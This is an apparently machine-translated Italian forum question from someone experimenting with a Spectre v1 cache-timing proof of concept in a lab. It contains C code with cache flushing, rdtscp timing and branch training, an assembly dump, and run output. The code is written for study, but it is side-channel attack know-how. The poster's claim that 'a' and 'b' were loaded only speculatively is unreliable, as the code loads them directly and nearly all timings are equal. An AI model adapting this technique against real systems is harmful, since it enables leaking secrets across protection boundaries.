Cercando di caricare "a" (lowecase a) speculativamente usando Spectre.
È stato suggerito qui:
Spectre Spectre - Basati su carta - risultati opposti
che il problema perché non carica in modo speculativo, potrebbe essere
- ramo non qualificato
- ottimizzazione del compilatore
Ecco il codice:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };
uint8_t array2[256 * 512];
for(int i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
for(int i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
printf("%c is speculatively executed\n",array1[103]);
int dummy = 0;
for(int i=0; i<104; i++) {
if (i != 103) {
array2[array1[i] * 512] = array1[i];
}
}
int t0,time_taken = 0;
int junk = 0;
int mix_i=0;
int i,j;
int aux,res;
char RandomId[28];
char ListId[28]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49};
srand(time(NULL));
for(i=0; i<28; i++)
{
res = rand() % 28;
aux = ListId[res];
if (ListId[res] != -1)
{
RandomId[i] = aux;
ListId[res] = -1;
}
else
i--;
}
volatile uint8_t * addr;
int y=0;
for(int i=0; i<28; i++)
{
mix_i = RandomId[i];
addr = &array2[mix_i * 512];
t0 = __rdtscp(&junk);
junk = *addr;
time_taken = __rdtscp(&junk) - t0;
if(mix_i>=49 && mix_i<=97)
if(mix_i==49)
printf("%c is not cached\n",mix_i);
printf("trying: %c time: %i\n",mix_i,time_taken);
}
}
Penso che spero che l'ottimizzazione del compilatore non sia il problema.
2 domande:
- Come posso verificare se il compilatore lo ha ottimizzato?
- Come posso addestrare il ramo?
Qualcuno può spiegare il secondo su questo o semplice esempio (con esempio di codice, output gdb?)
Grazie,
Aggiornamento 1:
Compilato il frammento sensibile (per loop).
user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };
uint8_t array2[256 * 512];
int dummy = 0;
for(int i=0; i<104; i++) {
if (i != 103) {
array2[array1[i] * 512] = array1[i];
}
}
}
Ecco il dump asm:
user@laptop:~/labspectre$ cat test.s
.file "test.c"
.text
.globl main
.type main, @function
main:
.LFB2:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $131328, %rsp
movq %fs:40, %rax
movq %rax, -8(%rbp)
xorl %eax, %eax
movb $65, -131200(%rbp)
movb $66, -131199(%rbp)
movb $67, -131198(%rbp)
movb $68, -131197(%rbp)
movb $69, -131196(%rbp)
movb $70, -131195(%rbp)
movb $71, -131194(%rbp)
movb $72, -131193(%rbp)
movb $73, -131192(%rbp)
movb $74, -131191(%rbp)
movb $75, -131190(%rbp)
movb $76, -131189(%rbp)
movb $77, -131188(%rbp)
movb $78, -131187(%rbp)
movb $79, -131186(%rbp)
movb $80, -131185(%rbp)
movb $81, -131184(%rbp)
movb $82, -131183(%rbp)
movb $83, -131182(%rbp)
movb $84, -131181(%rbp)
movb $85, -131180(%rbp)
movb $86, -131179(%rbp)
movb $87, -131178(%rbp)
movb $88, -131177(%rbp)
movb $89, -131176(%rbp)
movb $90, -131175(%rbp)
movb $65, -131174(%rbp)
movb $66, -131173(%rbp)
movb $67, -131172(%rbp)
movb $68, -131171(%rbp)
movb $69, -131170(%rbp)
movb $70, -131169(%rbp)
movb $71, -131168(%rbp)
movb $72, -131167(%rbp)
movb $73, -131166(%rbp)
movb $74, -131165(%rbp)
movb $75, -131164(%rbp)
movb $76, -131163(%rbp)
movb $77, -131162(%rbp)
movb $78, -131161(%rbp)
movb $79, -131160(%rbp)
movb $80, -131159(%rbp)
movb $81, -131158(%rbp)
movb $82, -131157(%rbp)
movb $83, -131156(%rbp)
movb $84, -131155(%rbp)
movb $85, -131154(%rbp)
movb $86, -131153(%rbp)
movb $87, -131152(%rbp)
movb $88, -131151(%rbp)
movb $89, -131150(%rbp)
movb $90, -131149(%rbp)
movb $65, -131148(%rbp)
movb $66, -131147(%rbp)
movb $67, -131146(%rbp)
movb $68, -131145(%rbp)
movb $69, -131144(%rbp)
movb $70, -131143(%rbp)
movb $71, -131142(%rbp)
movb $72, -131141(%rbp)
movb $73, -131140(%rbp)
movb $74, -131139(%rbp)
movb $75, -131138(%rbp)
movb $76, -131137(%rbp)
movb $77, -131136(%rbp)
movb $78, -131135(%rbp)
movb $79, -131134(%rbp)
movb $80, -131133(%rbp)
movb $81, -131132(%rbp)
movb $82, -131131(%rbp)
movb $83, -131130(%rbp)
movb $84, -131129(%rbp)
movb $85, -131128(%rbp)
movb $86, -131127(%rbp)
movb $87, -131126(%rbp)
movb $88, -131125(%rbp)
movb $89, -131124(%rbp)
movb $90, -131123(%rbp)
movb $65, -131122(%rbp)
movb $66, -131121(%rbp)
movb $67, -131120(%rbp)
movb $68, -131119(%rbp)
movb $69, -131118(%rbp)
movb $70, -131117(%rbp)
movb $71, -131116(%rbp)
movb $72, -131115(%rbp)
movb $73, -131114(%rbp)
movb $74, -131113(%rbp)
movb $75, -131112(%rbp)
movb $76, -131111(%rbp)
movb $77, -131110(%rbp)
movb $78, -131109(%rbp)
movb $79, -131108(%rbp)
movb $80, -131107(%rbp)
movb $81, -131106(%rbp)
movb $82, -131105(%rbp)
movb $83, -131104(%rbp)
movb $84, -131103(%rbp)
movb $85, -131102(%rbp)
movb $86, -131101(%rbp)
movb $87, -131100(%rbp)
movb $88, -131099(%rbp)
movb $89, -131098(%rbp)
movb $97, -131097(%rbp)
movq -131200(%rbp), %rax
movq %rax, -131312(%rbp)
movq -131192(%rbp), %rax
movq %rax, -131304(%rbp)
movq -131184(%rbp), %rax
movq %rax, -131296(%rbp)
movq -131176(%rbp), %rax
movq %rax, -131288(%rbp)
movq -131168(%rbp), %rax
movq %rax, -131280(%rbp)
movq -131160(%rbp), %rax
movq %rax, -131272(%rbp)
movq -131152(%rbp), %rax
movq %rax, -131264(%rbp)
movq -131144(%rbp), %rax
movq %rax, -131256(%rbp)
movq -131136(%rbp), %rax
movq %rax, -131248(%rbp)
movq -131128(%rbp), %rax
movq %rax, -131240(%rbp)
movq -131120(%rbp), %rax
movq %rax, -131232(%rbp)
movq -131112(%rbp), %rax
movq %rax, -131224(%rbp)
movq -131104(%rbp), %rax
movq %rax, -131216(%rbp)
movl $0, -131316(%rbp)
movl $0, -131320(%rbp)
jmp .L2
.L4:
cmpl $103, -131320(%rbp)
je .L3
movl -131320(%rbp), %eax
cltq
movzbl -131312(%rbp,%rax), %eax
movzbl %al, %eax
sall $9, %eax
movl %eax, %ecx
movl -131320(%rbp), %eax
cltq
movzbl -131312(%rbp,%rax), %edx
movslq %ecx, %rax
movb %dl, -131088(%rbp,%rax)
.L3:
addl $1, -131320(%rbp)
.L2:
cmpl $103, -131320(%rbp)
jle .L4
nop
movq -8(%rbp), %rax
xorq %fs:40, %rax
je .L5
call __stack_chk_fail
.L5:
leave
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE2:
.size main, .-main
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$
Per me sembra buono. Vedo il caricamento della matrice e di:
cmpl $103, -131320(%rbp)
je .L3
Verifica il valore di 103 nel ciclo.
Quindi NON è ottimizzato? Giusto?
Aggiornamento 3:
OK questa volta penso che funzioni. Carico "a" e "b" speculativamente. Come puoi vedere, non sono caricati nel codice.
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
void main(void)
{
//array of chars A-Z and "a" and "b" at the end
volatile uint8_t array1[105] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97,98 };
uint8_t array2[256 * 512];
for(int i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
for(int i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
printf("%c and %c are speculatively executed/loaded\n",array1[103],array1[104]);
srand(time(NULL));
unsigned int array1_size = 16;
int r,j = 0;
r = rand();
int tries = 0;
size_t training_x, x;
size_t malicious_x=r;
//printf("malicious_x: %i\n",malicious_x);
for (tries = 999; tries > 0; tries--) {
training_x = tries % array1_size;
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
for (j = 29; j >= 0; j--) {
_mm_clflush(&array1_size);
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
//printf("x: %i\n",x);
int dummy = 0;
for(int i=0; i<105; i++) {
//array[103] which is "a" will be loaded speculatively, as well as array[104]
if (x<103) {
array2[array1[i] * 512] = array1[i];
}
}
}
}
int t0,time_taken = 0;
int junk = 0;
int mix_i=0;
int i;
int aux,res;
char RandomId[29];
char ListId[29]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49,98};
for(i=0; i<29; i++)
{
res = rand() % 29;
aux = ListId[res];
if (ListId[res] != -1)
{
RandomId[i] = aux;
ListId[res] = -1;
}
else
i--;
}
volatile uint8_t * addr;
int y=0;
for(int i=0; i<29; i++)
{
mix_i = RandomId[i];
addr = &array2[mix_i * 512];
t0 = __rdtscp(&junk);
junk = *addr;
time_taken = __rdtscp(&junk) - t0;
if(mix_i>=49 && mix_i<=98)
if(mix_i==49)
printf("%c is not cached\n",mix_i);
printf("trying: %c time: %i\n",mix_i,time_taken);
}
}
Esecuzione:
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93
I valori memorizzati nella cache sono circa 90 cicli, non memorizzati nella cache di circa 300 cicli.